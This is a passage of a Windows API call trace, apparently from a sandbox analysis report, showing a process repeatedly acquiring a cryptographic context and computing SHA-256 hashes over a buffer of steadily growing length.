phProv=0xcdff0*=0x338239d0) returned 1 [0175.986] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.986] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x80, dwFlags=0x0) returned 1 [0175.986] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6af20 [0175.986] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.986] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0175.986] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821dd0) returned 1 [0175.987] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.987] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0175.987] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b2b0 [0175.987] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.987] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0175.987] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ad0) returned 1 [0175.987] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.987] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xc0, dwFlags=0x0) returned 1 [0175.987] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6abf0 [0175.988] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.988] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0175.988] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ed0) returned 1 [0175.988] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.988] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xe0, dwFlags=0x0) returned 1 [0175.988] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6acb0 [0175.988] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.988] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0175.988] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338229d0) returned 1 [0175.989] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.989] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x100, dwFlags=0x0) returned 1 [0175.989] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ad10 [0175.989] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.989] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0175.989] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822bd0) returned 1 [0175.989] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.989] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x120, dwFlags=0x0) returned 1 [0175.989] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b550 [0175.989] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.989] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0175.989] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338220d0) returned 1 [0175.990] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.990] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x140, dwFlags=0x0) returned 1 [0175.990] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b5e0 [0175.990] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.990] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0175.990] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338230d0) returned 1 [0175.991] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.991] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x160, dwFlags=0x0) returned 1 [0175.991] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ac20 [0175.991] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.991] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0175.991] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338238d0) returned 1 [0175.991] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.991] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x180, dwFlags=0x0) returned 1 [0175.991] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b2e0 [0175.991] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.991] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0175.991] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338229d0) returned 1 [0175.992] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.992] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x1a0, dwFlags=0x0) returned 1 [0175.992] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b6a0 [0175.992] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.992] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0175.992] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338238d0) returned 1 [0175.992] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.992] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x1c0, dwFlags=0x0) returned 1 [0175.993] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b0d0 [0175.993] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.993] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0175.993] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338230d0) returned 1 [0175.994] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.994] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x1e0, dwFlags=0x0) returned 1 [0175.994] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ada0 [0175.994] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.994] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0175.994] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338231d0) returned 1 [0175.994] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.994] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x200, dwFlags=0x0) returned 1 [0175.994] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b130 [0175.994] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.994] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0175.994] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338232d0) returned 1 [0175.995] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.995] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x220, dwFlags=0x0) returned 1 [0175.995] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ae60 [0175.995] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.995] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0175.995] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338229d0) returned 1 [0175.995] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.995] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x240, dwFlags=0x0) returned 1 [0175.996] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ae90 [0175.996] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.996] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0175.996] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338221d0) returned 1 [0175.996] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.996] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x260, dwFlags=0x0) returned 1 [0175.996] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6af50 [0175.996] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.996] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0175.996] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338230d0) returned 1 [0175.997] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.997] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x280, dwFlags=0x0) returned 1 [0175.997] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6aec0 [0175.997] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.997] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0175.997] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338234d0) returned 1 [0175.997] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.997] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x2a0, dwFlags=0x0) returned 1 [0175.997] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6af80 [0175.997] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.998] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0175.998] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822bd0) returned 1 [0175.998] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.998] CryptHashData (hHash=0x332b7ac0, pbData=0x32e5fa80, dwDataLen=0x2c0, dwFlags=0x0) returned 1 [0175.998] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b460 [0175.998] CryptDestroyHash (hHash=0x332b7ac0) returned 1 [0175.998] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0175.998] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822fd0) returned 1 [0175.999] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.999] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x2e0, dwFlags=0x0) returned 1 [0175.999] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b160 [0175.999] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.999] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0175.999] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338239d0) returned 1 [0175.999] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.999] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x300, dwFlags=0x0) returned 1 [0175.999] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b4c0 [0175.999] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.999] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0175.999] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338223d0) returned 1 [0176.000] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.000] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x320, dwFlags=0x0) returned 1 [0176.000] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b1c0 [0176.000] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.000] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0176.000] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338234d0) returned 1 [0176.001] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.001] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x340, dwFlags=0x0) returned 1 [0176.001] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b1f0 [0176.001] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.001] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0176.001] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ad0) returned 1 [0176.001] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.001] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x360, dwFlags=0x0) returned 1 [0176.001] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b220 [0176.001] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.001] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0176.001] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ed0) returned 1 [0176.002] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.002] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x380, dwFlags=0x0) returned 1 [0176.002] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b340 [0176.002] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.002] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0176.002] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338221d0) returned 1 [0176.002] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.002] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x3a0, dwFlags=0x0) returned 1 [0176.002] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b370 [0176.003] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0176.003] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0176.003] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823ad0) returned 1 [0176.003] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.003] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x3c0, dwFlags=0x0) returned 1 [0176.003] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b3d0 [0176.003] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.003] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0176.003] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338234d0) returned 1 [0176.004] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.004] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x3e0, dwFlags=0x0) returned 1 [0176.004] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b490 [0176.004] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.004] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0176.004] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338239d0) returned 1 [0176.004] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.004] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x400, dwFlags=0x0) returned 1 [0176.004] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b4f0 [0176.004] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.004] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0176.004] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822bd0) returned 1 [0176.005] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.005] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x420, dwFlags=0x0) returned 1 [0176.005] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b790 [0176.005] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.005] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0176.005] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822fd0) returned 1 [0176.006] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.006] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x440, dwFlags=0x0) returned 1 [0176.006] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6be80 [0176.006] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.006] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0176.006] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338228d0) returned 1 [0176.006] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.006] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x460, dwFlags=0x0) returned 1 [0176.006] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b940 [0176.006] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.006] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0176.006] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338236d0) returned 1 [0176.007] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.007] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x480, dwFlags=0x0) returned 1 [0176.007] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c210 [0176.007] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.007] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0176.007] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338221d0) returned 1 [0176.007] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.007] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x4a0, dwFlags=0x0) returned 1 [0176.008] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6bfd0 [0176.008] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.008] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0176.008] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338228d0) returned 1 [0176.008] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.008] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x4c0, dwFlags=0x0) returned 1 [0176.008] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6bc10 [0176.008] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.008] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0176.008] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822dd0) returned 1 [0176.013] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.013] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x4e0, dwFlags=0x0) returned 1 [0176.013] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c090 [0176.013] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.013] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0176.013] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822dd0) returned 1 [0176.013] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.013] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x500, dwFlags=0x0) returned 1 [0176.013] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6bc40 [0176.013] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.013] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0176.014] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822bd0) returned 1 [0176.014] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.014] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x520, dwFlags=0x0) returned 1 [0176.014] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6be50 [0176.014] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.014] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0176.014] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821ed0) returned 1 [0176.015] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.015] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x540, dwFlags=0x0) returned 1 [0176.015] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6bee0 [0176.015] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.015] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0176.015] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ad0) returned 1 [0176.015] CryptCreateHash (in: hProv=0x33822ad0, 